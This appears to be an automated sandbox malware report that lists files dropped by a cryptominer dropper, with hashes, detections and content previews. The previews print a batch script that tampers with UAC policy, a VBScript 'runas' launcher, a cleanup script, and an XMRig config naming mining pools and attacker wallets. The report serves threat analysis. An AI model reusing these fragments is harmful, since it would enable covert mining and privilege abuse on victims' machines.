SSDEEP:	3072:PgK8beoKKntiz73PXOAOZa0jgKX8rYNras:PgK8beoKKntiz73PXI4YNrL
MD5:	602EF9CC2B8D87D8D621345889DD8854
SHA1:	224A6ABC5AACC01210C1EE9438E275530D361C79
SHA-256:	086F16F8993CC15AE596B638524985A25AE0C0199B5BD286D9B3EF516F408EAB
SHA-512:	6D3D4732326177BD7779CF341A54FB287E72C41B8E8F421971A8867C5D19BF07649DBDFD9EF261D91F9FB3C895376343E5D97DE33EFE67EACEFDD0D887C6EF60
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\Start.cmd, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\Start.cmd, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..if not "%minimized%" == "" goto :minimized..set minimized=tru..start /min %WINDIR%\System32\cmd.exe /c "%~dpnx0"..goto :EOF..:minimized..(echo test)>"%temp%\Test1.txt"..(echo %~dp0)>"%temp%\PathView.txt"..Del /f /q "%temp%\NotAdmin1.txt">nul 2>nul..CD "%~dp0"..Set "wwwtime=0"..:wti..%WINDIR%\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" 2>nul\| %WINDIR%\System32\find.exe "0x0" >nul 2>nul..if "%ERRORLEVEL%" == "0" Goto :R_YADM..if "%UAAC%" == "1" Goto :RNoaaddd..%WINDIR%\System32\reg.exe query "HKCU\Software\Microsoft\Windows"..IF "%ERRORLEVEL%" == "1" Set "EReg=0"..IF "%EReg%" == "0" Goto :R_YADM..If "%wwwtime%" == "1" Goto :RNoaaddd.."%WINDIR%\System32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c "%WINDIR%\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-Itemproperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Pol

C:\Users\user\AppData\Local\Temp\Systemfont.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1072593
Entropy (8bit):	6.09356912081639
Encrypted:	false
SSDEEP:	12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
MD5:	3C47D45F09948B8E6FDB5F96523BC60B
SHA1:	A890EAAE8D5A45D54E7571C4BF780A6EB263586A
SHA-256:	86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
SHA-512:	6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................

C:\Users\user\AppData\Local\Temp\Systemfont.txt

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1072593
Entropy (8bit):	6.09356912081639
Encrypted:	false
SSDEEP:	12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
MD5:	3C47D45F09948B8E6FDB5F96523BC60B
SHA1:	A890EAAE8D5A45D54E7571C4BF780A6EB263586A
SHA-256:	86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
SHA-512:	6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................

C:\Users\user\AppData\Local\Temp\Test1.txt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.2516291673878226
Encrypted:	false
SSDEEP:	3:Hy:Hy
MD5:	9F06243ABCB89C70E0C331C61D871FA7
SHA1:	FDE773A18BB29F5ED65E6F0A7AA717FD1FA485D4
SHA-256:	837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B
SHA-512:	B947B99D1BADDD347550C9032E9AB60B6BE56551CF92C076B38E4E11F436051A4AF51C47E54F8641316A720B043641A3B3C1E1B01BA50445EA1BA60BFD1B7A86
Malicious:	false
Preview:	test..

C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8331776
Entropy (8bit):	6.602098080859404
Encrypted:	false
SSDEEP:	98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
MD5:	A6D4706BAEB9AB97490D745F7A2BB11E
SHA1:	A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
SHA-256:	96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
SHA-512:	5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`\|..........................idata...F...p...H...B\|.............@....CRT....h.............\|.............@....tls.................\|.............@....rsrc...S............\|.............@....reloc..p............~.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8331776
Entropy (8bit):	6.602098080859404
Encrypted:	false
SSDEEP:	98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
MD5:	A6D4706BAEB9AB97490D745F7A2BB11E
SHA1:	A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
SHA-256:	96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
SHA-512:	5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`\|..........................idata...F...p...H...B\|.............@....CRT....h.............\|.............@....tls.................\|.............@....rsrc...S............\|.............@....reloc..p............~.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1072593
Entropy (8bit):	6.09356912081639
Encrypted:	false
SSDEEP:	12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
MD5:	3C47D45F09948B8E6FDB5F96523BC60B
SHA1:	A890EAAE8D5A45D54E7571C4BF780A6EB263586A
SHA-256:	86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
SHA-512:	6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................

C:\Users\user\AppData\Local\Temp\Tweaker\aapub.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	5.135981028520709
Encrypted:	false
SSDEEP:	6:ZDH+7ym/eMTIaHPZLACCmqMeZaHPZLA4qnLVapFIuapv1BIapv:s2MTLg9MnlqnpugHIS
MD5:	2A13CDEE27030A33CF90E49F26B7B1AD
SHA1:	3BB5A27AD6F24BC81AA01461F3D389CC53DB589C
SHA-256:	8D53EF6F3E4FE49126BB49E112FF18813C7FB6C90E1B059746D979788F6721D2
SHA-512:	68CF4A487900DB356CD84EC3D450F2F9DE6410CD110E18C962538DF93E7D94422E3BE22ABC436EA4696143EDF730E2A6317BF1750B8689C12419AD3B208E80F9
Malicious:	false
Preview:	DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\Public\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\Public\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..

C:\Users\user\AppData\Local\Temp\Tweaker\aatem.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.184871037147829
Encrypted:	false
SSDEEP:	6:ZDH+7ym/eMTI923f+aLACCmqMeZ923f+aLA4qnLVapFIuapv1BIapv:s2MThJg9MdJlqnpugHIS
MD5:	B89E4D1C73C93C1F5EB440DD32D2E9EE
SHA1:	9164AD042146C0EF70B3A59DA92BE1AD2C8F20EB
SHA-256:	C132F398422167FE43AE86CA3CADCE67BE7BD33560FE42C12FFE067960A197D8
SHA-512:	084AD2D043ED93964B397EC6F98268D227586DB758D0E3789D269B6A8B3A46381C01FED6D79BD1D5A76D4545A798148BD5448F671EF1AD87544100DE32F3B32D
Malicious:	false
Preview:	DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\user\AppData\Local\Temp\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\user\AppData\Local\Temp\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..

C:\Users\user\AppData\Local\Temp\Tweaker\cache.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	984
Entropy (8bit):	5.179878767414784
Encrypted:	false
SSDEEP:	24:IYxUU9hcGhWYW88oW88GgW888W88h7rxK2t/90L:I2hcGwfvg7V1lS
MD5:	BBC072CDCCF0278CC55EFAEB0EE4438F
SHA1:	6BC1BF282FA17E8095466D50A0344F92C11732F5
SHA-256:	0ED58E0A88055B64ED7587C645D12EDF35C9C6C4DBB7943B2BB1071DC064239B
SHA-512:	AEC0958DE09DC2BDC695D405F8A9CF345465A1261F191536C7F0BD36890F0125048689CFB6B7B79708FFDA9B50EECCF6104582F3BE6450E37453BC825F083FC8
Malicious:	false
Preview:	@Echo off..if not "%minimized%" == "" goto :minimized1..set minimized=true..start /min C:\Windows\System32\cmd.exe /c "%~dpnx0"..goto :EOF..:minimized1..Title emd..IF EXIST "C:\Users\user\AppData\Local\Temp\screen.exe" (.."C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "emd"..)..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\.">nul 2>nul..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\.cmd">nul 2>nul..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\.vbs">nul 2>nul..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.exe">nul 2>nul..C:\Windows\System32\wbem\wmic.exe process where name="Systemfont.exe" call terminate>nul 2>nul..C:\Windows\System32\schtasks.exe /delete /tn "Svtasks" /f>nul 2>nul..del /f /q "C:\Users\user\AppData\Local\Temp\Svtasks.cmd">nul 2>nul..del /f /q "C:\Users\user\AppData\Local\Temp\backmn.cmd">nul 2>nul..

C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	6.15492829325332
Encrypted:	false
SSDEEP:	1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
MD5:	DDD12566B99343B96609AFA2524ECEC3
SHA1:	8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
SHA-256:	767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
SHA-512:	B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tweaker\conf.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	5.57285235961628
Encrypted:	false
SSDEEP:	24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
MD5:	73D059C6788D35FBF1CDC6ABD799DF52
SHA1:	A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
SHA-256:	C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
SHA-512:	EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
Malicious:	false
Preview:	{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..

C:\Users\user\AppData\Local\Temp\Tweaker\conf2.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	264
Entropy (8bit):	5.579378925177609
Encrypted:	false
SSDEEP:	6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
MD5:	B01A9D0151625441C4FC500F2E227439
SHA1:	0F2EC5AC6C9CFE12161512FC237E39335A82BF99
SHA-256:	3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
SHA-512:	A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
Malicious:	false
Preview:	[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..

C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	45568
Entropy (8bit):	7.750275657742685
Encrypted:	false
SSDEEP:	768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
MD5:	A1CD6A64E8F8AD5D4B6C07DC4113C7EC
SHA1:	60E2F48A51C061BBA72A08F34BE781354F87AA49
SHA-256:	B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
SHA-512:	87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
Malicious:	false
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

C:\Users\user\AppData\Local\Temp\Vnoad.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	4.886801557336521
Encrypted:	false
SSDEEP:	3:jNJmFEm86oQ/FERMQsQJM2xAvOUkh4E2J5xAI6IPF3ypFCvn:jqNhtCMGz923fjPFCrsn
MD5:	AE2417EB1062AACBD21DFCC09B0D3621
SHA1:	F0A97CBCC4F11E0407993D573595B53F64B4CE74
SHA-256:	5ECD6C9550FAB85D421A52F1E167708219A303B48A89788983CBC5FF0F057E73
SHA-512:	6E812AF3FC92EADF0BD5F2104AA338E90AFC37102CA858A8A02BA5C10A3010BBA59CEE5E15FB1B15B58340D75CADB90DC05A30FD5685C703FF1A3774C4EE6128
Malicious:	true
Preview:	Set Shell = CreateObject("Shell.Application")..Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\two.cmd", , , "runas", 0..

C:\Users\user\AppData\Local\Temp\WinRing0x64.sys

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\WinRing0x64.txt

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aapro.vbs

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	311
